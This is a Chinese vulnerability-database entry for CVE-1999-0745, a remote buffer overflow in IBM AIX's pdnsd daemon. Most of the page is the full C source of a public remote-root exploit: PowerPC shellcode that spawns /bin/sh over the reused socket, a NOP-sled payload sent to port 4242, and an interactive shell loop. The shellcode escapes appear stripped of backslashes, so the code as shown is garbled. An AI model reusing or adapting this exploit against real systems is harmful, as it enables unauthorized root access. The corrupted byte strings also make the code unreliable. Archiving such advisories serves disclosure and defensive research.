AIX pdnsd远程缓冲区溢出漏洞

AIX pdnsd远程缓冲区溢出漏洞

漏洞ID 1105513 漏洞类型 边界条件错误
发布时间 1999-08-17 更新时间 2005-05-02
图片[1]-AIX pdnsd远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-0745
图片[2]-AIX pdnsd远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199908-030
漏洞平台 AIX CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/21093
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199908-030
|漏洞详情
源代码浏览器的ProgramDatabaseNameServerDaemon(pdnsd)是IBM’sCSet++forAIX的组件。pdnsd存在一个缓冲区溢出漏洞,本地和远程攻击者可以利用这个漏洞获得系统的root用户权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/3237/info

The Source Code Browser's Program Database Name Server Daemon (pdnsd) component of the C Set ++ compiler for AIX contains a remotely exploitable buffer overflow. This vulnerability allows local or remote attackers to compromise root privileges on vulnerable systems.

/*## copyright LAST STAGE OF DELIRIUM oct 1999 poland        *://lsd-pl.net/ #*/
/*## pdnsd                                                                   #*/

/*   note: to avoid potential system hang-up please, first obtain the exact   */
/*   AIX OS level with the use of some OS fingerprinting method               */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>

#define ADRNUM 4000
#define NOPNUM 4800
#define ALLIGN 1

#define SCAIX41 "x03x68x41x5ex6dx7fx6fxd6x57x56x55x53"
#define SCAIX42 "x02x71x46x62x76x8ex78xe7x5bx5ax59x58"

char syscallcode[]=
    "x7ex94xa2x79"     /* xor.    r20,r20,r20            */
    "x40x82xffxfd"     /* bnel    <syscallcode>          */
    "x7exa8x02xa6"     /* mflr    r21                    */
    "x3axc0x01xff"     /* lil     r22,0x1ff              */
    "x3axf6xfex2d"     /* cal     r23,-467(r22)          */
    "x7exb5xbax14"     /* cax     r21,r21,r23            */
    "x7exa9x03xa6"     /* mtctr   r21                    */
    "x4ex80x04x20"     /* bctr                           */
    "xffxffxffxff"
    "xffxffxffxff"
    "xffxffxffxff"
    "x4cxc6x33x42"     /* crorc   cr6,cr6,cr6            */
    "x44xffxffx02"     /* svca    0x0                    */
    "x3axb5xffxf8"     /* cal     r21,-8(r21)            */
;

char findsckcode[]=
    "x2cx74x12x34"     /* cmpi    cr0,r20,0x1234         */
    "x41x82xffxfd"     /* beql    <findsckcode>          */
    "x7fx08x02xa6"     /* mflr    r24                    */
    "x3bx36xfex2d"     /* cal     r25,-467(r22)          */
    "x3bx40x01x01"     /* lil     r26,0x16               */
    "x7fx78xcax14"     /* cax     r27,r24,r25            */
    "x7fx69x03xa6"     /* mtctr   r27                    */
    "x4ex80x04x20"     /* bctr                           */
    "xa3x78xffxfe"     /* lhz     r27,-2(r24)            */
    "xa3x98xffxfa"     /* lhz     r28,-6(r24)            */
    "x7cx1bxe0x40"     /* cmpl    cr0,r27,r28            */
    "x3bx36xfex59"     /* cal     r25,-423(r22)          */
    "x41x82xffxe4"     /* beq     <findsckcode+20>       */
    "x7fx43xd3x78"     /* mr      r3,r26                 */
    "x38x98xffxfc"     /* cal     r4,-4(r24)             */
    "x38xb8xffxf4"     /* cal     r5,-12(r24)            */
    "x93x38xffxf4"     /* st      r25,-12(r24)           */
    "x88x55xffxf6"     /* lbz     r2,-10(r21)            */
    "x7exa9x03xa6"     /* mtctr   r21                    */
    "x4ex80x04x21"     /* bctrl                          */
    "x37x5axffxff"     /* ai.     r26,r26,-1             */
    "x2dx03xffxff"     /* cmpi    cr2,r3,-1              */
    "x40x8axffxc8"     /* bne     cr2,<findsckcode+32>   */
    "x40x82xffxd8"     /* bne     <findsckcode+48>       */
    "x3bx36xfex03"     /* cal     r25,-509(r22)          */
    "x3bx76xfex02"     /* cal     r27,-510(r22)          */
    "x7fx23xcbx78"     /* mr      r3,r25                 */
    "x88x55xffxf7"     /* lbz     r2,-9(r21)             */
    "x7exa9x03xa6"     /* mtctr   r21                    */
    "x4ex80x04x21"     /* bctrl                          */
    "x7cx7axdax14"     /* cax     r3,r26,r27             */
    "x7ex84xa3x78"     /* mr      r4,r20                 */
    "x7fx25xcbx78"     /* mr      r5,r25                 */
    "x88x55xffxfb"     /* lbz     r2,-5(r21)             */
    "x7exa9x03xa6"     /* mtctr   r21                    */
    "x4ex80x04x21"     /* bctrl                          */
    "x37x39xffxff"     /* ai.     r25,r25,-1             */
    "x40x80xffxd4"     /* bge     <findsckcode+100>      */
;

char shellcode[]=
    "x7cxa5x2ax79"     /* xor.    r5,r5,r5               */
    "x40x82xffxfd"     /* bnel    <shellcode>            */
    "x7fxe8x02xa6"     /* mflr    r31                    */
    "x3bxffx01x20"     /* cal     r31,0x120(r31)         */
    "x38x7fxffx08"     /* cal     r3,-248(r31)           */
    "x38x9fxffx10"     /* cal     r4,-240(r31)           */
    "x90x7fxffx10"     /* st      r3,-240(r31)           */
    "x90xbfxffx14"     /* st      r5,-236(r31)           */
    "x88x55xffxf4"     /* lbz     r2,-12(r21)            */
    "x98xbfxffx0f"     /* stb     r5,-241(r31)           */
    "x7exa9x03xa6"     /* mtctr   r21                    */
    "x4ex80x04x20"     /* bctr                           */
    "/bin/sh"
;

char nop[]="x7fxffxfbx78";

main(int argc,char **argv){
    char buffer[10000],address[4],*b;
    int i,n,l,cnt,sck;
    struct hostent *hp;
    struct sockaddr_in adr;

    printf("copyright LAST STAGE OF DELIRIUM oct 1999 poland  //lsd-pl.net/n");
    printf("pdnsd for AIX 4.1 4.2 PowerPC/POWERnn");

    if(argc!=3){
        printf("usage: %s address 41|42n",argv[0]);exit(-1);
    }

    switch(atoi(argv[2])){
    case 41: memcpy(&syscallcode[32],SCAIX41,12); break;
    case 42: memcpy(&syscallcode[32],SCAIX42,12); break;
    default: exit(-1);
    }

    sck=socket(AF_INET,SOCK_STREAM,0);
    adr.sin_family=AF_INET;
    adr.sin_port=htons(4242);
    if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
        if((hp=gethostbyname(argv[1]))==NULL){
            errno=EADDRNOTAVAIL;perror("error");exit(-1);
        }
        memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
    }

    if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
        perror("error");exit(-1);
    }

    l=ADRNUM+NOPNUM+strlen(shellcode);
    *((unsigned long*)address)=htonl(0x2ff20908+(NOPNUM>>1));

    i=sizeof(struct sockaddr_in);
    if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
        struct netbuf {unsigned int maxlen;unsigned int len;char *buf;}nb;
        ioctl(sck,(('S'<<8)|2),"sockmod");
        nb.maxlen=0xffff;
        nb.len=sizeof(struct sockaddr_in);;
        nb.buf=(char*)&adr;
        ioctl(sck,(('T'<<8)|144),&nb);
    }
    n=ntohs(adr.sin_port);
    printf("port=%d connected! ",n);fflush(stdout);

    findsckcode[0+2]=(unsigned char)((n&0xff00)>>8);
    findsckcode[0+3]=(unsigned char)(n&0xff);

    b=buffer;
    *((unsigned long*)b)=htonl(l);
    b+=4;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(syscallcode);i++) *b++=syscallcode[i];
    for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
    for(i=0;i<strlen(shellcode);i++)   *b++=shellcode[i];
    for(i=0;i<ALLIGN;i++) *b++=address[i%4];
    for(i=0;i<ADRNUM;i++) *b++=address[i%4];
    *b=0;

    write(sck,buffer,4+l-1);sleep(3);
    send(sck,"x",1,0);
    printf("sent!n");

    write(sck,"/bin/uname -an",14);
    while(1){
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(0,&fds);
        FD_SET(sck,&fds);
        if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
            int cnt;
            char buf[1024];
            if(FD_ISSET(0,&fds)){
                if((cnt=read(0,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(sck,buf,cnt);
            }
            if(FD_ISSET(sck,&fds)){
                if((cnt=read(sck,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(1,buf,cnt);
            }
        }
    }
}
|参考资料

来源:BID
名称:590
链接:http://www.securityfocus.com/bid/590
来源:CIAC
名称:J-059
链接:http://www.ciac.org/ciac/bulletins/j-059.shtml
来源:NSFOCUS
名称:4025
链接:http://www.nsfocus.net/vulndb/4025

相关推荐: WebCalendar SQL Injection Vulnerability

WebCalendar SQL Injection Vulnerability 漏洞ID 1097131 漏洞类型 Input Validation Error 发布时间 2005-02-17 更新时间 2005-02-17 CVE编号 N/A CNNVD-I…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享